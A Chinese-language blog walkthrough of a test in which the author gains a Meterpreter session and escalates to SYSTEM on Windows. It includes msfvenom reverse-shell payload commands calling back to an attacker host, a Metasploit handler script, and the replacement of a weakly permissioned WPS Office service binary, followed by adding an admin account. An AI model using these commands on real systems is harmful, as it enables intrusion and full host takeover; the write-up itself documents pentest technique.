记一次简单的win提权

简介: 记一次简单的win提权

1、前言


在一次测试中,通过rce漏洞获得了目标主机meterpreter会话,尝试进行一些提权实验。

过程中两台机子都不通外网,本文记录一下获得会话并提权过程。


2、获取msf会话


生成一个exe载荷,看情况免杀:


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.135 LPORT=443 -f exe -o 666.exe


在准备让目标机执行我们的载荷前,先使用脚本(通过msfpc来生成)来快速监听会话,并进行一些自动进程迁移的工作:


msfconsole -q -r '/home/yanghao/windows-meterpreter-staged-reverse-tcp-443-exe.rc'


脚本内容如下:


use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.122.135set LPORT 443set ExitOnSession falseset EnableStageEncoding trueset EnableUnicodeEncoding trueset AutoRunScript 'post/windows/manage/migrate' run -j


参数的具体含义可以在设置了payload后执行show advanced查看:

1bd55cb99e7a584885bcee56f1411ff9_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

开始监听:

57333ed3d7a9c5aef43f6958c70da092_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

在目标机上执行生成的exe,获取会话:

4e6da5d20e6f7ecf8fa6fed48464768d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


3、尝试提权


看了下目标已经是管理员权限了,如果要抓密码的话,得拿到system,准备试试。先ps看一下进程,发现有杀软,不过没关系,没有外网战力-50%:


4c55e28751bc917d2ec03b43a49825c5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png 假装getsystem一下,whoami /priv 查看一下权限:

5b2987044d79f97656de22c70f951a3e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

4e37d57282fe789278dde72fc3b99e83_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


localexploitsuggester 模块失败


试试自带的模块来检查提取漏洞:


use post/multi/recon/local_exploit_suggester


35317a29320f90f3daed23b207b9164b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png 发现有了一些漏洞,然后就加载对应的利用模块来进行尝试:

b2a00aa9a88e6a99511bbf9338702a2b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

e910d52c8d3cb841843c90017981bd6c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

d7bd5836d8e5451e09e59a0406bdc549_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


柳暗花明 (enum_services利用)


差不多模块都试了一下,因为有杀软的原因,都失败了。这时候想着找点新的exp来用用,但是网络不太方便,就先看看主机上的情况,先看了下主机上启动的服务情况:


use post/windows/gather/enum_services


c896b56d02d9385d8005fa57e2c8a5ef_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现了一个在D盘的服务(wpscloudsvr LocalSystem "D:\Program Files\WPS Office\wpscloudsvr.exe" LocalService):

0896df58e1fcdc21f67b4806136b201a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

这里我们知道, 在C盘Windows,Program Files等目录下的文件都会被系统权限保护,而这个wpscloudsvr服务的可执行文件放在了D盘 (这也是个很正常的事,总不能啥软件都往C盘装吧)如果软件开放过程中未对这种类似服务的文件进行权限限制同时可以对服务进行重启动,那么就可以利用替换该服务文件的方法来获得权限提升。接下来通过 cacls wpscloudsvr.exe 查看文件权限,发现权限设置不当,标准用户可以对其更改 (图找不到了,大概结果就像下面这样),同时也可以直接使用net命令对服务进行启动和停止:

22103d7f1eaeff01a77422480cb4133a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

现在条件都满足了,生成个马给这个文件替换了,重新启动服务不就完成提权了吗?快速操作中...


1、使用msfvenom生成一个exe-service类型的载荷:


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.135 LPORT=8522 -f exe-service -o wpscloudsvr.exe


469fe6b66bfb55885c93fdd4cba2476e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


2、上传并启动服务,并获得了会话:


uplaod /xx/xx/wpscloudsvr.exe "D:\\Program Files\\WPS Office\\wpscloudsvr.exe"
shell>net start wpscloudsvr

89e684ec45248295d00b36577e3ef7c0_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png 这里就拿到了system权限的会话了:

807c2b9477a52e37a142809845763306_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

5f36236eb617c04f5613e9a099967b29_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png 后面就是上远程桌面看看,加个管理员账户什么的:

34e9a6ee1ae1f82735cf6d2d87bad60b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

ca460ae180a07106d4351b5397516460_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


4、总结


  • 1、使用metasploit脚本进行自动化设置
  • 2、metasploit本地提权漏洞扫描、利用,相关信息收集模块使用;
  • 3、服务可执行文件权限设置不当的cacls检查、exe-service载荷生成、替换执行提权。


5、参考


https://blog.csdn.net/l1028386804/article/details/86669614


相关文章
|
安全 关系型数据库 MySQL
windows提权总结
windows提权总结
346 1
|
Java 测试技术 Windows
利用Windows RpcSs服务进行提权
利用Windows RpcSs服务进行提权
275 0
|
安全 Windows
Windows2003系统漏洞提权复现
操作系统: Microsoft Windows Server 2003 Web服务器: IIS V6.0 第一步,将大马文件上传至服务器根目录
566 0
Windows2003系统漏洞提权复现
|
安全 Shell 数据安全/隐私保护
[windows提权] 详解-可信任服务路径提权
"包含空格但没有引号的服务路径",利用windows解析文件路径的特性,如果一个服务的可执行文件路径热设置不当,攻击者可构造对应的可执行文件,从而利用提权,powerup的Get-ServiceUnquoted模块、配合MSF,可以自动化帮我们完成提权
295 0
|
安全 Windows
windows提权
windows提权
164 0
|
XML 安全 网络协议
干货 | 最全windows提权总结
干货 | 最全windows提权总结
908 0
|
安全 Windows
[windows提权] 注册表AlwaysInstallElevated提权
注册表AlwaysInstallElevated是策略设置项,允许低权限用户以system权限运行安装文件,powerup中的Get-RegistryAlwaysInstallElevate模块可用来检查注册表键是否被设置。如果为Ture就证明是以system权限运行的,可提权。
387 0
|
存储 安全 中间件
Windows提权小结
Windows提权小结
150 0
|
安全 Ubuntu Linux
Windows提权漏洞集合
Windows提权漏洞集合
546 0
Windows提权漏洞集合
|
Web App开发 Shell Windows
在msf和powershell中利用hotpotato进行提权
本文讲的是在msf和powershell中利用hotpotato进行提权,通过类似SMB协议的NTLM认证已经被微软修补了,不过HTTP到SMB正在使用这种验证,并且还用于创建高权限服务中。因为流量包中含有NTLM凭据并且正在通过伪代理服务器,因此可以将其捕获并传递到本地SMB侦听器,作为SYSTEM权限执行任何命令。
2526 0